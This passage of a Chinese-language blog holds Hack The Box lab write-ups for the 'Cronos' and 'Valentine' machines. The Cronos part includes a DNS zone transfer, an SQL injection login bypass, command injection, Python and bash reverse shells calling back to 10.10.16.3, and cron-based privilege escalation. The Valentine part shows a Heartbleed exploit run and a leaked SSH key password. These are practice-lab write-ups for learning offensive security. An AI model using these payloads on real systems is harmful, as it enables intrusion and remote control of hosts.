&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>拿到ns1.cronos.htb&lt;/p>
&lt;p>使用dig查询DNS记录，DNS服务器存在区域传输漏洞可以使用axfr&lt;/p>
&lt;p>&lt;a href="http://t.zoukankan.com/ibyte-p-6114893.html" target="_blank" rel="noopener">http://t.zoukankan.com/ibyte-p-6114893.html&lt;/a>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">dig axfr cronos.htb @10.10.10.13
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_sAnBS78Ei5_hu4548ab3cf56d1f8c72e5b2e1bf4546a3_191256_74da189e95b96a8bb9693f84c1999e6c.webp 400w,
/post/hackbox/cronos/image/image_sAnBS78Ei5_hu4548ab3cf56d1f8c72e5b2e1bf4546a3_191256_467c2d7dbb81e04ad6693afe2c174637.webp 760w,
/post/hackbox/cronos/image/image_sAnBS78Ei5_hu4548ab3cf56d1f8c72e5b2e1bf4546a3_191256_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_sAnBS78Ei5_hu4548ab3cf56d1f8c72e5b2e1bf4546a3_191256_74da189e95b96a8bb9693f84c1999e6c.webp"
width="1078"
height="430"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>拿到三个子域名，&lt;code>ns1,www,admin&lt;/code>&lt;/p>
&lt;p>添加到&lt;code>/etc/hosts&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_ZULWhSdmer_hu0963322d3f651997ca7998da2d7191be_78813_07f69a7d01631d35f648f7732d7c0b97.webp 400w,
/post/hackbox/cronos/image/image_ZULWhSdmer_hu0963322d3f651997ca7998da2d7191be_78813_fbf7b7f7ed9580201e118b30c2d2782b.webp 760w,
/post/hackbox/cronos/image/image_ZULWhSdmer_hu0963322d3f651997ca7998da2d7191be_78813_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_ZULWhSdmer_hu0963322d3f651997ca7998da2d7191be_78813_07f69a7d01631d35f648f7732d7c0b97.webp"
width="808"
height="277"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>访问&lt;code>www.cronos.htb&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_AwM3N2EVOb_hu71d18623db31ae9b42bfe71777e26b42_43965_bb6b4f4c7923a6dd1725c437c2c89b84.webp 400w,
/post/hackbox/cronos/image/image_AwM3N2EVOb_hu71d18623db31ae9b42bfe71777e26b42_43965_3e7e50ae931c45aee7fc5743e6047833.webp 760w,
/post/hackbox/cronos/image/image_AwM3N2EVOb_hu71d18623db31ae9b42bfe71777e26b42_43965_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_AwM3N2EVOb_hu71d18623db31ae9b42bfe71777e26b42_43965_bb6b4f4c7923a6dd1725c437c2c89b84.webp"
width="1227"
height="544"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>看了下源码都是跳转到laravel官网，没有发现什么功能&lt;/p>
&lt;p>扫web目录，没发现有价值的信息&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_CaQPkqJaY-_hu85137351c4017415ca3d876f47287cc8_36910_1976ec12fc96b89841d02379233a058a.webp 400w,
/post/hackbox/cronos/image/image_CaQPkqJaY-_hu85137351c4017415ca3d876f47287cc8_36910_ef8c0212ab853981064559759b250f64.webp 760w,
/post/hackbox/cronos/image/image_CaQPkqJaY-_hu85137351c4017415ca3d876f47287cc8_36910_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_CaQPkqJaY-_hu85137351c4017415ca3d876f47287cc8_36910_1976ec12fc96b89841d02379233a058a.webp"
width="913"
height="314"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>访问&lt;code>admin.cronos.htb&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_z8SCXudxFx_hu80a723c2e7fa86331015e64c7dda507c_31807_5234be9abb9ab5075f31e833e5941a14.webp 400w,
/post/hackbox/cronos/image/image_z8SCXudxFx_hu80a723c2e7fa86331015e64c7dda507c_31807_f548311b3770d0fe03a766bd48f8ca8e.webp 760w,
/post/hackbox/cronos/image/image_z8SCXudxFx_hu80a723c2e7fa86331015e64c7dda507c_31807_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_z8SCXudxFx_hu80a723c2e7fa86331015e64c7dda507c_31807_5234be9abb9ab5075f31e833e5941a14.webp"
width="785"
height="495"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>尝试过admin枚举没有成功&lt;/p>
&lt;p>SQL注入登录成功&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">username：&lt;span class="s1">&amp;#39; or 1=1#
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s1">password：&amp;#39;&lt;/span> or &lt;span class="nv">1&lt;/span>&lt;span class="o">=&lt;/span>1#
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_6MLEHHFaOE_hu9bb49d9f727ccb6f70ed25c9fcb25133_30404_4fedd4a85df8c87b8fc32f7a221d953c.webp 400w,
/post/hackbox/cronos/image/image_6MLEHHFaOE_hu9bb49d9f727ccb6f70ed25c9fcb25133_30404_ea03f6842d62c4271dd3fb13c5de7ac6.webp 760w,
/post/hackbox/cronos/image/image_6MLEHHFaOE_hu9bb49d9f727ccb6f70ed25c9fcb25133_30404_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_6MLEHHFaOE_hu9bb49d9f727ccb6f70ed25c9fcb25133_30404_4fedd4a85df8c87b8fc32f7a221d953c.webp"
width="788"
height="298"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>存在命令执行&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">8.8.8.8&lt;span class="p">;&lt;/span>id
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_wDMgSlnZEc_hu388ffbd45ed2142f74d44dc74a779161_20782_3a8b4b28085ef1872f64e44cf4b99472.webp 400w,
/post/hackbox/cronos/image/image_wDMgSlnZEc_hu388ffbd45ed2142f74d44dc74a779161_20782_b7245cb22acc075cb87ba571c08c177c.webp 760w,
/post/hackbox/cronos/image/image_wDMgSlnZEc_hu388ffbd45ed2142f74d44dc74a779161_20782_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_wDMgSlnZEc_hu388ffbd45ed2142f74d44dc74a779161_20782_3a8b4b28085ef1872f64e44cf4b99472.webp"
width="642"
height="239"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>反弹shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">8.8.8.8&lt;span class="p">;&lt;/span>python -c &lt;span class="s1">&amp;#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&amp;#34;10.10.16.3&amp;#34;,2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&amp;#34;/bin/sh&amp;#34;,&amp;#34;-i&amp;#34;]);&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>或者&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">POST /welcome.php HTTP/1.1
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Host: admin.cronos.htb
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">User-Agent: Mozilla/5.0 &lt;span class="o">(&lt;/span>X11&lt;span class="p">;&lt;/span> Linux x86_64&lt;span class="p">;&lt;/span> rv:91.0&lt;span class="o">)&lt;/span> Gecko/20100101 Firefox/91.0
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept: text/html,application/xhtml+xml,application/xml&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.9,image/webp,*/*&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Language: zh-CN,zh&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.8,zh-TW&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.7,zh-HK&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.5,en-US&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.3,en&lt;span class="p">;&lt;/span>&lt;span class="nv">q&lt;/span>&lt;span class="o">=&lt;/span>0.2
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Accept-Encoding: gzip, deflate
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Content-Type: application/x-www-form-urlencoded
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Content-Length: &lt;span class="m">68&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Origin: http://admin.cronos.htb
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Connection: close
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Referer: http://admin.cronos.htb/welcome.php
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Cookie: &lt;span class="nv">PHPSESSID&lt;/span>&lt;span class="o">=&lt;/span>r5bp088ag2fp2k38m0rronkfj4
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Upgrade-Insecure-Requests: &lt;span class="m">1&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">command&lt;/span>&lt;span class="o">=&lt;/span>bash+-c+&lt;span class="s1">&amp;#39;bash+-i+&amp;gt;%26+/dev/tcp/10.10.16.3/2333+0&amp;gt;%261&amp;#39;&lt;/span>&lt;span class="p">&amp;amp;&lt;/span>&lt;span class="nv">host&lt;/span>&lt;span class="o">=&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_E6MJ1aQBYs_hub42abb2cf52733889efe513d5f764705_55272_d1e06b41c08a1c4145042faf9d621a0b.webp 400w,
/post/hackbox/cronos/image/image_E6MJ1aQBYs_hub42abb2cf52733889efe513d5f764705_55272_5b9252878c43a831d7cdc237c515b5c5.webp 760w,
/post/hackbox/cronos/image/image_E6MJ1aQBYs_hub42abb2cf52733889efe513d5f764705_55272_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_E6MJ1aQBYs_hub42abb2cf52733889efe513d5f764705_55272_d1e06b41c08a1c4145042faf9d621a0b.webp"
width="974"
height="219"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>升级交互式shell&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python -c &lt;span class="s1">&amp;#39;import pty;pty.spawn(&amp;#34;bash&amp;#34;)&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Ctrl+Z
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">stty raw -echo&lt;span class="p">;&lt;/span>&lt;span class="nb">fg&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">Enter
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>提权&lt;/p>
&lt;p>使用&lt;code>pspy32&lt;/code>，检测到&lt;code>root&lt;/code>每分钟会执行&lt;code>www-data&lt;/code>的php脚本，&lt;code>/var/www/laravel/artisan&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_QVucIY8EFn_hu6f5823a60fb474064f25fd0dd684fba7_27198_8698a049629dda9124bf6325eae65425.webp 400w,
/post/hackbox/cronos/image/image_QVucIY8EFn_hu6f5823a60fb474064f25fd0dd684fba7_27198_49a0ca031bc6da247ad17ff0ff854eb8.webp 760w,
/post/hackbox/cronos/image/image_QVucIY8EFn_hu6f5823a60fb474064f25fd0dd684fba7_27198_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_QVucIY8EFn_hu6f5823a60fb474064f25fd0dd684fba7_27198_8698a049629dda9124bf6325eae65425.webp"
width="1079"
height="96"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>查看&lt;code>/var/www/laravel/artisan&lt;/code>发现是反弹shell脚本，而&lt;code>www-data&lt;/code>有该文件读写权限&lt;/p>
&lt;p>修改此处&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_vm1H9V2LXQ_hu8f1d448dcde3b40bba44ad953feedcdb_45706_62690c25ac4b8105dd01284cd6619062.webp 400w,
/post/hackbox/cronos/image/image_vm1H9V2LXQ_hu8f1d448dcde3b40bba44ad953feedcdb_45706_b7015d6fdc5b4c74afca9fb869ad630c.webp 760w,
/post/hackbox/cronos/image/image_vm1H9V2LXQ_hu8f1d448dcde3b40bba44ad953feedcdb_45706_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_vm1H9V2LXQ_hu8f1d448dcde3b40bba44ad953feedcdb_45706_62690c25ac4b8105dd01284cd6619062.webp"
width="753"
height="341"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>一分钟反弹shell成功&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/cronos/image/image_SX4Hn1WC9E_hue3e32d52b831ecc797061c7d1bcffbce_31946_10687e250aa265cb48a6b0057d873ba6.webp 400w,
/post/hackbox/cronos/image/image_SX4Hn1WC9E_hue3e32d52b831ecc797061c7d1bcffbce_31946_8c6e2a42fc14ccf4d48bb3a1c8d28936.webp 760w,
/post/hackbox/cronos/image/image_SX4Hn1WC9E_hue3e32d52b831ecc797061c7d1bcffbce_31946_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/cronos/image/image_SX4Hn1WC9E_hue3e32d52b831ecc797061c7d1bcffbce_31946_10687e250aa265cb48a6b0057d873ba6.webp"
width="753"
height="175"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p></description></item><item><title>Valentine</title><link>https://docs.kaiasec.tk/post/hackbox/valentine/</link><pubDate>Fri, 13 May 2022 16:06:40 +0800</pubDate><guid>https://docs.kaiasec.tk/post/hackbox/valentine/</guid><description>&lt;p>nmap&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="n">sudo&lt;/span> &lt;span class="n">nmap&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">T4&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">Pn&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="n">sV&lt;/span> &lt;span class="mf">10.10.10.79&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_NsGV6cgvjb_hu7da7fad9e96c751193ac2e4e10d2e5f9_70696_fa7ce1c3ffe6c08ad4d05cbca94b805d.webp 400w,
/post/hackbox/valentine/image/image_NsGV6cgvjb_hu7da7fad9e96c751193ac2e4e10d2e5f9_70696_79ea6a3c63ae901cb63a2e517bfa2242.webp 760w,
/post/hackbox/valentine/image/image_NsGV6cgvjb_hu7da7fad9e96c751193ac2e4e10d2e5f9_70696_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_NsGV6cgvjb_hu7da7fad9e96c751193ac2e4e10d2e5f9_70696_fa7ce1c3ffe6c08ad4d05cbca94b805d.webp"
width="940"
height="292"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>访问80，图片给的提示应该是心脏出血漏洞 &lt;a href="https://zh.m.wikipedia.org/zh-hans/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E" title="heartbleed " target="_blank" rel="noopener">heartbleed &lt;/a>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_tss7pXDmIc_hu9e80794d75ffc422db18b5d04e8c5c25_1009251_ecd4ccba3ce9cb54e6665db8d4eb4a25.webp 400w,
/post/hackbox/valentine/image/image_tss7pXDmIc_hu9e80794d75ffc422db18b5d04e8c5c25_1009251_849005bea0e6b9dfd5d72dc1e578366a.webp 760w,
/post/hackbox/valentine/image/image_tss7pXDmIc_hu9e80794d75ffc422db18b5d04e8c5c25_1009251_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_tss7pXDmIc_hu9e80794d75ffc422db18b5d04e8c5c25_1009251_ecd4ccba3ce9cb54e6665db8d4eb4a25.webp"
width="1328"
height="742"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>dirbuster扫描web路径&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_bv47XCHRCw_huc609bdba4e34a5c693b4c0b4f7b08a14_34843_f5851eff65b9098ea5e39ca3c14500ad.webp 400w,
/post/hackbox/valentine/image/image_bv47XCHRCw_huc609bdba4e34a5c693b4c0b4f7b08a14_34843_94d23d4468f66bdffbf094dab03cb998.webp 760w,
/post/hackbox/valentine/image/image_bv47XCHRCw_huc609bdba4e34a5c693b4c0b4f7b08a14_34843_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_bv47XCHRCw_huc609bdba4e34a5c693b4c0b4f7b08a14_34843_f5851eff65b9098ea5e39ca3c14500ad.webp"
width="883"
height="309"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-text" data-lang="text">&lt;span class="line">&lt;span class="cl">http://10.10.10.79/dev/
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_G3_LldCdHm_hu3cf5de79b6625974c09d43da366373bd_55028_a4c8dcf2e267f8d634e900d18a91cb6d.webp 400w,
/post/hackbox/valentine/image/image_G3_LldCdHm_hu3cf5de79b6625974c09d43da366373bd_55028_64c2921382e86bcf9e426fc0ed85b86b.webp 760w,
/post/hackbox/valentine/image/image_G3_LldCdHm_hu3cf5de79b6625974c09d43da366373bd_55028_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_G3_LldCdHm_hu3cf5de79b6625974c09d43da366373bd_55028_a4c8dcf2e267f8d634e900d18a91cb6d.webp"
width="799"
height="347"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>hype_key&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_IgC8c1OYv5_hua10998d5c96f39827f4f1b5de6fa9284_310562_058ae33808879d13a606ab6398bb4f52.webp 400w,
/post/hackbox/valentine/image/image_IgC8c1OYv5_hua10998d5c96f39827f4f1b5de6fa9284_310562_1965e1f6407243815cc80c8a18d1e02d.webp 760w,
/post/hackbox/valentine/image/image_IgC8c1OYv5_hua10998d5c96f39827f4f1b5de6fa9284_310562_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_IgC8c1OYv5_hua10998d5c96f39827f4f1b5de6fa9284_310562_058ae33808879d13a606ab6398bb4f52.webp"
width="1440"
height="525"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;pre tabindex="0">&lt;code class="language-纯文本" data-lang="纯文本">xxd -r -p hype_key&amp;gt;id_rsa
&lt;/code>&lt;/pre>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_7-qQtUPX8s_huc1abcbbfbf26f919b008d1db9a4766d5_392019_4cf06534121f5de187246a60274c02a2.webp 400w,
/post/hackbox/valentine/image/image_7-qQtUPX8s_huc1abcbbfbf26f919b008d1db9a4766d5_392019_4597064cb1c68cc837a1afbcf392fac6.webp 760w,
/post/hackbox/valentine/image/image_7-qQtUPX8s_huc1abcbbfbf26f919b008d1db9a4766d5_392019_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_7-qQtUPX8s_huc1abcbbfbf26f919b008d1db9a4766d5_392019_4cf06534121f5de187246a60274c02a2.webp"
width="690"
height="624"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>发现是ssh登录需要的密钥文件，hype应该是用户名，尝试登录，发现需要密码&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_2z0OBFl_i__hu7f72ccd8d5f38be468775f859e7e3748_17461_852fb4bda83a685229e6d14b429033de.webp 400w,
/post/hackbox/valentine/image/image_2z0OBFl_i__hu7f72ccd8d5f38be468775f859e7e3748_17461_7c0fe3f76267ca496a902fad9ea3be9b.webp 760w,
/post/hackbox/valentine/image/image_2z0OBFl_i__hu7f72ccd8d5f38be468775f859e7e3748_17461_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_2z0OBFl_i__hu7f72ccd8d5f38be468775f859e7e3748_17461_852fb4bda83a685229e6d14b429033de.webp"
width="470"
height="90"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p> &lt;a href="https://zh.m.wikipedia.org/zh-hans/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E" title="heartbleed " target="_blank" rel="noopener">heartbleed &lt;/a>漏洞利用&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#查找kali上的脚本&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">searchsploit heartbleed
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#复制到当前目录&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">searchsploit -m 32745.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_ky3LX1QALh_hu3b8f5dc610b3157bfdedca081be4a617_122499_dc03500b8ac3036da178e040fc138f6b.webp 400w,
/post/hackbox/valentine/image/image_ky3LX1QALh_hu3b8f5dc610b3157bfdedca081be4a617_122499_041b687f5a24110b1ce9a0645cfa771a.webp 760w,
/post/hackbox/valentine/image/image_ky3LX1QALh_hu3b8f5dc610b3157bfdedca081be4a617_122499_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_ky3LX1QALh_hu3b8f5dc610b3157bfdedca081be4a617_122499_dc03500b8ac3036da178e040fc138f6b.webp"
width="967"
height="525"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">python2 32745.py -h
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">python2 32745.py 10.10.10.79
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/valentine/image/image_uINzUaKvA7_hub60c37ab2883d3e8bf6722c9d6fbaaac_188893_015bf76b8e123982ca183fdbb0f1a4e7.webp 400w,
/post/hackbox/valentine/image/image_uINzUaKvA7_hub60c37ab2883d3e8bf6722c9d6fbaaac_188893_53ab471b687b5abbc5758267a3da0025.webp 760w,
/post/hackbox/valentine/image/image_uINzUaKvA7_hub60c37ab2883d3e8bf6722c9d6fbaaac_188893_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/valentine/image/image_uINzUaKvA7_hub60c37ab2883d3e8bf6722c9d6fbaaac_188893_015bf76b8e123982ca183fdbb0f1a4e7.webp"
width="961"
height="720"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>得到&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$text&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg&lt;/span>&lt;span class="o">==&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#base64解码，这个应该就是密码&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> base64 -d
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">heartbleedbelievethehype
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>登录&lt;/p>
